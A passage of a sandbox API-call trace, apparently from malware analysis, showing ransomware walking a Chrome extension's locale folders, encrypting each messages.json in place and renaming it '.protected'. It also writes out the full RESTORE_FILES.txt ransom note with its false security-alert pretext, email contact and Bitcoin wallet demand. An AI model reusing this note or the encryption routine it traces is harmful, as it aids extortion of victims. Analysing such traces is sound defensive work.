Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\..") returned 153 [0083.458] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.458] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.458] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.458] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.458] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.458] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.458] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.458] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.458] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json") returned 164 [0083.458] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.459] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.459] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.459] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json") returned 164 [0083.459] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json") returned 164 [0083.459] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json") returned 164 [0083.459] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.459] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.474] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.475] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.475] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.475] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.475] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.475] CloseHandle (hObject=0x168) returned 1 [0083.475] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.protected") returned 174 [0083.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.protected")) returned 1 [0083.476] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.476] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.476] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\RESTORE_FILES.txt") returned 
168 [0083.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.477] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.477] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.477] lstrlenA (lpString="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") returned 684 [0083.477] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.477] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.477] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0083.478] CloseHandle (hObject=0x164) returned 1 [0083.478] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.478] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0083.478] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0083.478] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0083.478] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0083.478] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0083.478] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es") returned 150 [0083.478] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0083.478] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0083.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\*") returned 152 [0083.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.478] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.478] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.478] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.478] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.478] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.478] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\.") returned 152 [0083.478] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.478] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.478] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.478] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.478] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.478] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.478] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\..") returned 153 [0083.478] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.478] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.478] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.478] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.478] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.478] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.478] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.478] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json") returned 164 [0083.479] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.479] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.479] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.479] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json") returned 164 [0083.480] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json") returned 164 [0083.480] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json") 
returned 164 [0083.480] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.480] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.483] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.483] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.484] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.484] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.484] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.484] CloseHandle (hObject=0x168) returned 1 [0083.484] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.protected") returned 174 [0083.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.protected")) returned 1 [0083.485] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.485] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.485] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\RESTORE_FILES.txt") returned 168 [0083.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.485] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.485] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.486] lstrlenA (lpString="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") returned 684 [0083.486] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0083.486] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.486] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.486] CloseHandle (hObject=0x164) returned 1 [0083.487] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.487] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0083.487] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0083.487] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0083.487] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0083.487] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0083.487] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et") returned 150 [0083.487] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0083.487] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0083.487] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\*") returned 152 [0083.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0083.487] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.487] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.487] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.487] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.487] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.487] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\.") returned 152 [0083.487] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.487] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.487] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.487] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.487] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.487] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.487] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.487] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\..") returned 153 [0083.487] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.487] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.487] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.487] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.487] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.487] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0083.487] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.487] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.487] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json") returned 164 [0083.488] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.488] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.488] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.488] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 